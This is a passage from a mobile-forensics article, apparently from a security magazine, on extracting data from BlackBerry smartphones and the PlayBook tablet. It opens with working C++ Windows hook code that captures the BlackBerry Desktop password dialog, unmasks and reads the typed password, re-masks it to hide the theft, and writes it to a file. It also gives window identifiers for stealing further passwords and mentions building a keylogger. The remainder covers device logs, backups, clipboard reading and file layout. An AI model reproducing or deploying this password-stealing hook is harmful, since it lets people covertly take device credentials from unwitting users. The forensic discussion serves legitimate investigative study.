SysHook = SetWindowsHookEx(WH_GETMESSAGE, &SysMsgProc, hInst, 0);}else{

//clear our storage is it’s unhookedin_list->Clear();UnhookWindowsHookEx(SysHook);

}}//---------------------------------------------------------------------------LRESULT CALLBACK SysMsgProc(int code, WPARAM wParam, LPARAM lParam)

//hook code, removal flag, address of structure with message{

//Pass message to other system hooksCallNextHookEx(SysHook, code, wParam, lParam);

//Check Messageif (code == HC_ACTION){

//Get Window’s Handler that give a messageWnd = ((tagMSG*)lParam)->hwnd;

//ClassName of Windowchar *internal = "#32770";

Don’t Be Mocked Secure Your System21 / 108

//Caption of Windowchar *external = "Device Password Required";//Catch a WindowHWND window = FindWindow(internal, external);if ((bool)(int)window){

//Label like "Password:"char *stat_pass_text = (char *)malloc(256);//Label like "PIN of Device:"char *stat_devc_text = (char *)malloc(256);//Label like "Your attempt counts:"char *stat_attmp_text = (char *)malloc(256);

//In Z-order first of all get a password-static controlHWND stat_pass = FindWindowEx(window, NULL, "Static", "Password:");//In Z-order previous of it is attemp’s countHWND stat_attmp = GetWindow(stat_pass, 3);//In Z-order next of it is Device PINHWND stat_devc = GetWindow(stat_pass, 2);

//get control’s caption for a password-static controlGetWindowText(stat_pass, stat_pass_text, 256);//get control’s caption for a pin-static controlGetWindowText(stat_attmp, stat_attmp_text, 256);//get control’s caption for a attemp_count-static controlGetWindowText(stat_devc, stat_devc_text, 256);

AnsiString DEV_PIN = AnsiString(stat_devc_text);AnsiString ATTEMPT = AnsiString(stat_attmp_text);

//correct a program version://if NULL then BlackBerry Manager v4 or BlackBerry Manager v5//else everythin ’s OK - BlackBerry Desktop Manager v6if (DEV_PIN.Length() < 1){

int pos = AnsiPos("\n", AnsiString(ATTEMPT.c_str()));//extract a first part of Static (PIN)DEV_PIN = ATTEMPT.SubString(1, pos - 1);//extract a second part of Static (attempt’ count)AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT. ←↩

Length() - pos);}

free(stat_devc_text);free(stat_attmp_text);free(stat_pass_text);

//get handler of EditBoxHWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL);//Check desirable EditBox (with Parent Form’s Caption "Device ←↩

Password Requied")If ( ((bool)(int)pass_hwnd) & (pass_hwnd == Wnd) ){

//unset password maskingSendMessage(Wnd, EM_SETPASSWORDCHAR, 0, 0);//ReDraw EditBoxInvalidateRect(Wnd, 0, true);

//allocate memory for edit’s passwordchar *passw = (char *)malloc(256);

//Password’s borrowing

Don’t Be Mocked Secure Your System22 / 108

SendMessage(Wnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw);

//store in new variableAnsiString password = AnsiString(passw);free(passw);

//Don’t let him (user) see it. Paint out.//0x25CF is unicode character of black circle//(dialog boxes on Win7, XP).SendMessageW(Wnd, EM_SETPASSWORDCHAR, 0x25cf, 0);//ReDraw EditBoxInvalidateRect(Wnd, 0, true);

//If action is unsuccessfull set "EMPTY" infoif (DEV_PIN.Length() == 0){

DEV_PIN = "EMPTY";}if (ATTEMPT.Length() == 0){

ATTEMPT = "EMPTY";}if (password.Length() == 0){

password = "EMPTY";}

//Store in StringList variable our PIN, attempts count and ←↩pass

in_list->Add(DEV_PIN);in_list->Add(ATTEMPT);in_list->Add(password);

try{

in_list->SaveToFile("c:\\pass.txt");}catch (Exception *ex){

}}}

}return 0;

}

Grand Success! Look at figures 14-15. We have just caught a bit more extra-protected password.

Don’t Be Mocked Secure Your System23 / 108

Figure 1.14: Stolen password (v6) - part I

Figure 1.15: Stolen password (v6) - part II

If we manage not with tray application but main BlackBerry Desktop Software (v6-7) then we are not lucky and need to catchanother password dialog built in application as well as backup pass dialog. BlackBerry Manager v4 or v5 is based on C++ (andmethod is the same like previous), but BlackBerry Desktop Manager is based on C# and .NET according to PE analyzers. Thus,it impossible to use WINAPI for stealing. Nevertheless, there’s solving. We still can catch a window dialog like Unlockingdevice and Backup device’s data. Look at THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE and figures 16-17

THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWAREWINDOW TEXT BlackBerry® Desktop SoftwareCLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;4f73dd50-23b3-416c-9ae3-81d8908073f1]WINDOW TEXT Unlock BlackBerry® deviceCLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;606b4596-b8eb-4102-8d62-5c87d2220001]WINDOW TEXT Back Up OptionsCLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;547a3dd4-57aa-4e40-a2ea-16b19fd1697e]

Don’t Be Mocked Secure Your System24 / 108

Figure 1.16: BlackBerry Desktop Manager’s Handlers – part I

Figure 1.17: BlackBerry Desktop Manager’s Handlers – part II

According to DLL-Catcher and system hooks is possible to make a key-logger that waiting two handler then stealing a passwordand hibernating watcher mechanism.

Gathering Logs

Previous article on forensics mentioned that BlackBerry Smartphone SDK and BlackBerry Desktop Software have two tools(javaloader, and loader) to provide classic forensic. All PlayBook SDK provided by RIM, e.g. Adobe Air SDK has a tool"blackberry-connect" is just a wrapper for "Connect.jar". But before connect RSA key-pair should be generated by "ssh-keygen-t rsa -b 4096" and "Development Mode" option enabled. Then should be typed target ip (often 169.254.0.1 for USB), devicepassword and ssh key as parameters. This tool extracts device information (like OS, fingerprint, hardware id, vendors id, debugmode tokens, etc.), application list information (like module, version, icon ID, name, vendor, source, etc.) and more. In addition,

Don’t Be Mocked Secure Your System25 / 108

Wi-Fi logs stored IP, DNS, subnet mask; information about (un-)successful attempts may be analyzed by manual acquisitiononly. See section "Device Information", "Application List", and pictures (18-21).

Application List

Info: Sending request: ListInfo: Action: List@applicationsIMplus.gYABgI3xb8I_.nuWDj1NQXBLFM0::gYABgI3xb8I_-nuWDj1NQXBLFM0,1.4.0.0,contentID::44726, ←↩

iconID::291534,name::IM+ for BlackBerry PlayBook,sku::IMPlus_for_BlackBerry_PlayBook, ←↩vendor::SHAPE,id::559225,releaseType::1,version::1.4,size::1221509,source::appworld

WeatherEye10856d5e12aafbeab482ffb6197b1513.gYABgIBVxHVXGt5sqs7ysg11.RY:: ←↩gYABgIBVxHVXGt5sqs7ysg11-RY,1.1.0.0,contentID::40883,iconID::266669,name::WeatherEye HD, ←↩sku::SKU_WEATHEREYEHD1,vendor::The Weather Network,id::286667,releaseType::1,version ←↩::1.1,size::1411489,source::appworld

WeatherMap.gYABgKX7io3amtWzWeXo8.d.kSQ::gYABgKX7io3amtWzWeXo8-d-kSQ,1.2.9.350,contentID ←↩::33880,iconID::225599,name::Weather Map,sku::WeatherMap,vendor::Christian Ruiz,id ←↩::262761,releaseType::1,version::1.2.9,size::1419549,source::appworld

com.facebookforplaybook.gYABgGIoTQuGRMYqlV83okVZick::gYABgGIoTQuGRMYqlV83okVZick,2.2.1.7, ←↩contentID::43106,iconID::280252,name::Facebook for BlackBerry PlayBook,sku:: ←↩FacebookforPlayBook,vendor::Research In Motion Limited,id::477829,releaseType::1,version ←↩::2.2.1.7,size::4382469,source::appworld

sys.uri.twitter.gYABgForKB9INNC6dqqT5_aG.wE::gYABgForKB9INNC6dqqT5_aG-wE,2.0.1.15,source:: ←↩websl,scmbundle::2.0.1.358

sys.videochat.gYABgHXmq9LYQB023b3XQAWry1k::gYABgHXmq9LYQB023b3XQAWry1k,2.0.1.247,source:: ←↩websl,scmbundle::2.0.1.358

sys.videoplayer.gYABgEydozZr9q.ClZkrItC9LMM::gYABgEydozZr9q-ClZkrItC9LMM,2.0.1.234,source:: ←↩websl,scmbundle::2.0.1.358

sys.voicerecorder.gYABgCpT2Fra8qyc1S2btWJS_S4::gYABgCpT2Fra8qyc1S2btWJS_S4,2.0.1.233,source ←↩::websl,scmbundle::2.0.1.358

sys.weather.gYABgKOf0EhVEWtCxrbBQ00sPSg::gYABgKOf0EhVEWtCxrbBQ00sPSg,2.0.1.234,source:: ←↩websl,scmbundle::2.0.1.358

sys.youtube.gYABgPcyRJTp899l1vKiJZewK88::gYABgPcyRJTp899l1vKiJZewK88,2.0.1.240,source:: ←↩websl,scmbundle::2.0.1.358

Device Information

Info: Sending request: ListInfo: Sending request: List Device InfoInfo: Action: List Device Info[n]@devicepropertiesdevice_os::BlackBerry PlayBook OSdrmhwfp:: 0x62xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxfingerprint:: 3pIxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxhardwareid::0x06xxxxxxradiofingerprint::nonescmbundle::2.0.1.xxxscmbundle0::2.0.1.xxxscmbundle1::2.0.1.xxxvendorid::0x1f8[n]@devicepropertiesdevicepin::0x50xxxxxxdeviceserialnumber::00xxxxxxx13xxx95xxxx[n]@devmode[n]debug_token_author::Yury Chemerkin[n]debug_token_expiration::Sat May 12 00:22:58 GMT+0400 2012[n]debug_token_installed:b:true[n]debug_token_timeout::10d[n]debug_token_valid:b:true[n]debug_token_validation_error::[n]debug_token_validation_error_code:n:0[n]dev_mode_enabled:b:true[n]dev_mode_expiration::10d

Don’t Be Mocked Secure Your System26 / 108

[n]dev_mode_waiting:b:true@versionsair_version::3.1.0.38flash_version::11.1.121.38build_id:: 186xxxproduction_device:b:true

Figure 1.18: Wi-Fi Status and logs

Figure 1.19: Log options

Don’t Be Mocked Secure Your System27 / 108

Figure 1.20: Wi-Fi Info

Figure 1.21: Logs

Wi-Fi Logs

********************************Wi-Fi Diagnostics Logs

********************************

Don’t Be Mocked Secure Your System28 / 108

******DEVICE INFORMATION

******> Physical Address: e8:xx:xx:xx:xx:xx> Device OS: BlackBerry PlayBook OS> Device Pin: 500xxxxx> OS Version: 2.0.1.668

******INTERNET CONNECTION

******> IP Address: 192.168.1.31> Subnet Mask: 255.255.255.0> Default Gateway: 192.168.1.1> Primary DNS: 192.168.1.1> Secondary DNS:> Domain Suffix:> MTU: 1500> Proxy Server:> Proxy Port:

******WI-FI INFORMATION

******> Status: Connected> Failure Reason:> Profile Name: XXXX> SSID: XXXX> Channel: 11> AP MAC Address: 48:xx:xx:xx:xx:xx> Security Type: WPA2 Personal> EAP Method:> Signal Level: -41 dBm> Connection Data Rate: 65 Mbps> Network Type: 802.11g/n

********************************Supplicant Logs

********************************> 21:27:40: v1 CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ ←↩

id=0 id_str=]> 21:27:40: v2 WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]> 21:27:39: v3 Associated with 48:xx:xx:xx:xx:xx> 21:27:39: v4 Trying to associate with 48:xx: xx:1 xx 3:c9:4d (SSID=XXX freq=2462 MHz)> 21:27:19: v5 CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys> 00:10:34: v6 CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ ←↩

id=0 id_str=]> 00:10:34: v7 WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]> 00:10:34: v8 Associated with 48:xx:xx:xx:xx:xx> 20:41:30: v9 CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ ←↩

id=0 id_str=]> 20:41:30: v10WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP]> 20:41:30: v11Associated with 48:xx:xx:xx:xx:xx> 20:41:30: v12Trying to associate with 48:xx:xx:xx:xx:xx (SSID=’XXXX’ freq=2462 MHz)> 20:26:03: v13CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys> 17:49:29: v14CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (auth) [id ←↩

=0 id_str=]

Don’t Be Mocked Secure Your System29 / 108

Backup Data

Managing with backup starts with BlackBerry Desktop Manager that results ".IPD" (early, now it is ".BBB" file is just compresswith tar) in a destination folder. This file stores:

• on BlackBerry smartphone very granulated data (incl. Options) like Address Book, Alarm, Attachment, AutoText, BlackBerryBridge, BlackBerry Wallet, Bluetooth, Browser, Calendar, Camera, Certificate, etc.

• on BlackBerry tablet only Application Data, Media and Settings. As PlayBook does not provide native Password Wallet, manythird party applications often save data in shared\documents folder in ".db" format easy analyzed if no encryption.

BlackBerry Simulation

The BlackBerry Smartphone Simulator built for simulating a backup copy of the physical device. This is helpful if the device islow on battery, should be placed to the "turn off" state, or you do not want to alter the data on the physical device. Followingsteps are suitable for each BlackBerry device model. Nevertheless, there is no similar solution for the PlayBook as well as forAndroid, despite of that is very useful and valuable.

Live (Spy) forensic

There some situations that is not desirable to shut down, seize the digital device, and perform the forensic analysis at the lab.For example, if there is an indication that an encryption mechanism used on the digital device that was discovered, then theinvestigator should not shutdown this digital device. Otherwise, after shutdown all encrypted information (potential evidence)will be unintelligible. By performing Live Analysis, the investigators attempt to extract the encryption key from the runningsystem.

An up-to-date BlackBerry has many data, such as several mobile or home phone number, faxes, emails, work and home addresses,web-pages or dates; IM data and social data, private data such as tracking info, habits, time marked a free, time when user’spossible sleeping, time when user’s at home/company can come to light and many else. However, all those can be extracted onlywith API or Backup file.

Clipboard is breakable too because user have to see a password to retype in another application that can easily be screen-capturedor to copy into clipboard that not protected, because user still have to put data (password) into non-protected text-box, sometimesin plaintext even. In other words, end-point object is vulnerable. As Clipboard API exists like getClipboard() on BlackBerry,getData() on PlayBook, or getText() on Android (see the Listing 7).

Listing 7. Clipboard events for PlayBook

package{

import flash.desktop.Clipboard;import flash.desktop.ClipboardFormats;import flash.desktop.ClipboardTransferMode;import flash.display.Sprite;import flash.display.StageAlign;import flash.display.StageScaleMode;import flash.text.TextField;

import qnx.events.ClipboardEvent;import qnx.events.QNXSystemEvent;

public class Clipboard1 extends Sprite{

public function Clipboard1(){

super();

Don’t Be Mocked Secure Your System30 / 108

stage.align = StageAlign.TOP_LEFT;stage.scaleMode = StageScaleMode.NO_SCALE;

var tf:TextField = new TextField();tf.height = 600;tf.width = 1024;tf.text = "result = \n" + paste();this.addChild(tf);

}private function write():String{

return ClipboardEvent.CLIPBOARD_WRITE;}

private function read():String{

return ClipboardEvent.CLIPBOARD_READ;}

private function copy(text:String):void{

Clipboard.generalClipboard.clear();Clipboard.generalClipboard.setData(ClipboardFormats.TEXT_FORMAT, ←↩

text);}

private function paste():String{

if(Clipboard.generalClipboard.hasFormat(ClipboardFormats. ←↩TEXT_FORMAT))

{return String(Clipboard.generalClipboard.getData( ←↩

ClipboardFormats.TEXT_FORMAT));}else{

return null;}

}}

}

Figure 1.22: Clipboard Formats

To access to the Pictures, Videos, Voice notes, and other files, some of them may be video captured or audio captured, forensicsexpert rarely need to intercept API events or break root rights; all needs is listen file events of creating and deleting files or grab

Don’t Be Mocked Secure Your System31 / 108

these files from internal/external storage. Pictures are more inquisitive as camera-snapshots since it has EXIF-header. Metadatais, quite simply, data about data. Many digital camera manufacturers, such as Canon, Sony and Kodak implement EXIF headers.This header is stored in an "application segment" of a JPEG file, or as privately defined tags in a TIFF file. Not only basiccameras have these headers, but also both mobile devices provide the "Camera Make" as RIM/BlackBerry/Android/HTC dataas well as "Camera Model" may often be device model. GPS or date tag often renames filename by placing into beginning cityname except Android and PlayBook. They place GPS and date tag in EXIF only. Just remind: photos named IMG20120103-xxxx. To talk about geo-tag per file then I will get a "Moskva" prefix in file name. Of course, it is not enough when city namesnamed in the same manner like US states, however, it may differ because I cannot test it. Anyway, it is obvious why developersstore name of file as city part, Date part and increment part. Some examples for the PlayBook: camera - Research In Motion,model – BlackBerry Playbook, exposure – 1/xxx s, diaphragm opening – 2.97, flash – no, EXIF version – 0230. Audio notes,photos, videos, music, and camera’s data stored in one place (more correctly in two places, on internal storage and externalstorage like SD-card if an external exists). Any programmers are allowed to listen these folder path to extract your data in real-time; moreover they may have exactly API to access to the same folders. They may associate their listeners with specified fileformat like AMR (BlackBerry Smartphone) or m4a (BlackBerry Tablet) that used to store your BlackBerry voice notes. Theyoften store in "voice notes" folder, named as VN-20120319-xxxx.AMR or VN-20120319-xxxx.m4a. "20120319" is date withYYYY-MM-DD formatting. As you can see, you do not need to extract properties to know when it recorded; you do not evenneed to link (programmatically) folder with type file (logical level) because "VN" is voice note. Recorded video files named"VID-YYYYMMDD-XXXXXX.3GP" as voice note or picture file for BlackBerry Smartphone and VID- XXXXXX.MP4 fortablet.

Each application has access to its own working directory in the file system on the PlayBook, and might access to the shared folder(sandbox) because of the access to the files and folders governed by UNIX-style groups and permissions. It means applicationscannot create new directories in the working directory; they can only access the folders listed in Table 1.

Table 1.1: Table 1. Playbook Shared folders structure

Folder What data contains Access typeapp The installed application’s files. read-onlydata The application’s private data. read and write accesstemp The application’s temporary working

files.read and write access

logs System logs for an application (stderrand stdout)

read and write access

shared Subfolders that contain shared datagrouped by type.

no access

shared/bookmarks Web browser bookmarks that can beshared among applications.

read and write access

shared/books eBook files that can be shared amongapplications.

read and write access

shared/clipboard Data copied or cut from anotherapplication (txt, html, uri format).

read and write access

shared/documents Documents that can be shared amongapplications.

read and write access

shared/downloads Web browser downloads. read and write accessshared/misc Miscellaneous data that can be shared

among applications.read and write access

shared/music Music files that can be shared amongapplications.

read and write access

shared/photos Photos that can be shared amongapplications.

read and write access

shared/videos Videos that can be shared amongapplications.

read and write access

shared/voice Audio recordings that can be sharedamong applications.

read and write access

Don’t Be Mocked Secure Your System32 / 108

Table 1.2: Table 2. Extractable Data

Type BlackBerry OSBlackBerry Smarpthone BlackBerry Playbook

Address Book + -Calendar Events + -Call History + -Browser history and bookmarks + +Process Management + -Memos and Tasks + -Screen-shots + +Camera-shots + +Videocamera-shots + +Clipboard + +Location tracking (cell, wifi, gps,bluetooth)

+ +

SMS/MMS/Emails/IM + -Saved Messages + -Pictures, Videos, Voice notes, andother files

+ +

File and Folder structure + +IMs + -Passwords + +Clipboard + +

Conclusion

Mobile devices are everywhere, and contain more evidence about their users than perhaps any other source. The technology isconstantly changing, making forensics a challenge. Handled properly, however, a forensic examination of a mobile device canyield evidence that cannot be found anywhere else, including communications and geographic location data that can change thecourse of an entire case or investigation.

The BlackBerry devices as well as Android devices share the same evidentiary value as any other Personal Digital Assistant(mobile device). As the investigator may suspect of most file systems, a delete is by no means a total removal of data onthe device. However, the BlackBerry smartphone is always-on, wireless push technology adds a unique dimension to forensicexamination. Android and Playbook instead tends to be more offline and wake up by user actions.

All mentioned above highlights value and up-to-date techniques on forensics area, some of them based on issues misunderstand-ing development concepts or else. Similar to the BlackBerry, Push-technology allows information be pushed through its radioantenna at any time, potentially overwriting previously "deleted" data. Classic Forensics techniques or DLP system is ineffectiveto stop it because of time, applications that exchanged data in real-time. In addition, the password has a long-term problem.Some techniques very impactful but limited special cases. It’s obvious Android should be rooted, BlackBerry smartphone shouldhave a backup or correspond to the forensics methods and tools, while Playbook limits with shared folder only and there’s noway to root it or mirror all data to the PlayBook simulator as it was for BlackBerry smartphone. The files store on external orinternal storage might be useful to obtain some data stored in backup or available to API. It means forensics needs more practicaland preventive techniques to extract data. Simply using developer’s API helps to grab data like password for social networks ormail inbox in blackberry smartphone cases that do not stored anywhere. In addition, IM chats do not store else external/internalstorage and can only be accessible in way data extracting but if password is known and storage does not encrypted. It means livetechniques through API make sense only. Moreover, there is technique preventing successful USB or Bluetooth connection as alive-agent performing DDoS to the event-listener.

Finally, all security holes or vendor vision about security on their OS are very astounding to use, it reduces the risks for loss ofvaluable data and improve existing solutions. In addition, forensics expert protected from almost all objectives capable break andstop forensics investigation.

Don’t Be Mocked Secure Your System33 / 108

On the Net

• To Get Round to the Heart of Fortress. Hakin9 Extra. Yury Chemerkin: http://hakin9.org/to-get-round-to-the-heart-of-fortress/

• Why is password protection a fallacy a point of view, Hakin9 Extra, Yury Chemerkin: http://hakin9.org/hakin9-extra-12011-exploiting-software/

• The Philosophy of QNX Neutrino: https://developer.blackberry.com/native/documentation

• The QNX Neutrino Microkernel: https://developer.blackberry.com/native/documentation

• Dynamic Linking: https://developer.blackberry.com/native/documentation

• Process Manager: https://developer.blackberry.com/native/documentation

• What is BlackBerry Tablet OS?: https://developer.blackberry.com/native/documentation

• Managing your application through the application life cycle: https://developer.blackberry.com/native/documentation

• Accessing restricted functionality: https://developer.blackberry.com/native/documentation

• Folders accessible by an application: https://developer.blackberry.com/native/documentation

• Filesystems: https://developer.blackberry.com/native/documentation

• Networking Architecture: https://developer.blackberry.com/native/documentation

• TCP/IP Networking: https://developer.blackberry.com/native/documentation

• A Playbook for Real-Time, Closed-Loop Control, Harry Funk, Robert Goldman, Christopher Miller, John Meisner, Peggy Wu,Smart Information Flow Technologies, LLC: http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA439281

• When Developer’s API Simplify User-Mode Rootkits Developing, Hakin9 Mobile Magazine: http://hakin9.org/hakin9-mobile-22012-2

• When Developers API Simplify User-Mode Rootkits Development - Part II, Hakin9 OnDemand Magazine: http://hakin9.org/-hakin9-ondemand-network-security-4124

• "Insecurity of blackberry solutions: Vulnerability on the edge of the technologies," vol. 6, pp. 20-21, December 2011 [AnnualInfoSecurity Russia Conf., 2011]

• D. M. Gomez, A. Davis, BlackBerry PlayBook Security: Part one. NGS Secure, 2011.: http://www.nccgroup.com/secure/-hVq8hE-N4Wc%3d/1099

• BlackBerry PlayBook Security - Part Two - BlackBerry Bridge, G. Jones, NGS Secure, 2011: http://www.nccgroup.com/-secure/V20GFyDJrD0%3d/1099

• Mobile Device Forensics: A Brave New World? Contributed by Jason Gonzalez and James Hung, Stroz Friedberg LLC:http://www.strozfriedberg.com/files/Publication/

• Challenges in Mobile Phone Forensics, Kyle D. Lutes, Richard P. Mislan: http://www.iiis.org/cds2008/cd2008sci/citsa2008/-paperspdf/i649ok.pdf

• Mobile Forensics: an Overview, Tools, Future trends and Challenges from Law Enforcement perspective, Rizwan Ahmed,Rajiv V. Dharaskar: http://www.iceg.net/2008/books/2/34_312-323.pdf

Don’t Be Mocked Secure Your System34 / 108

About the author

Yury Chemerkin Graduated at Russian State University for the Humanities (http://rggu.com/) in 2010. At present postgrad-uate at RSUH. Information Security Researcher since 2009 and currently works as mobile and social information securityresearcher in Moscow. Experienced in Reverse Engineering, Software Programming, Cyber & Mobile Security Researching,Documentation, and Security Writing as regular contributing. Now researching Cloud Security and Social Privacy.ContactsI have many social contacts to help you choose the most suitable way for you.Regular blog: http://security-through-obscurity.blogspot.comRegular Email: yury.chemerkin@gmail.comSkype: yury.chemerkinOther my contacts (blogs, IM, social networks) you will find among http links and social icons before TimeLine section on Re.Vu:http://re.vu/yury.chemerkin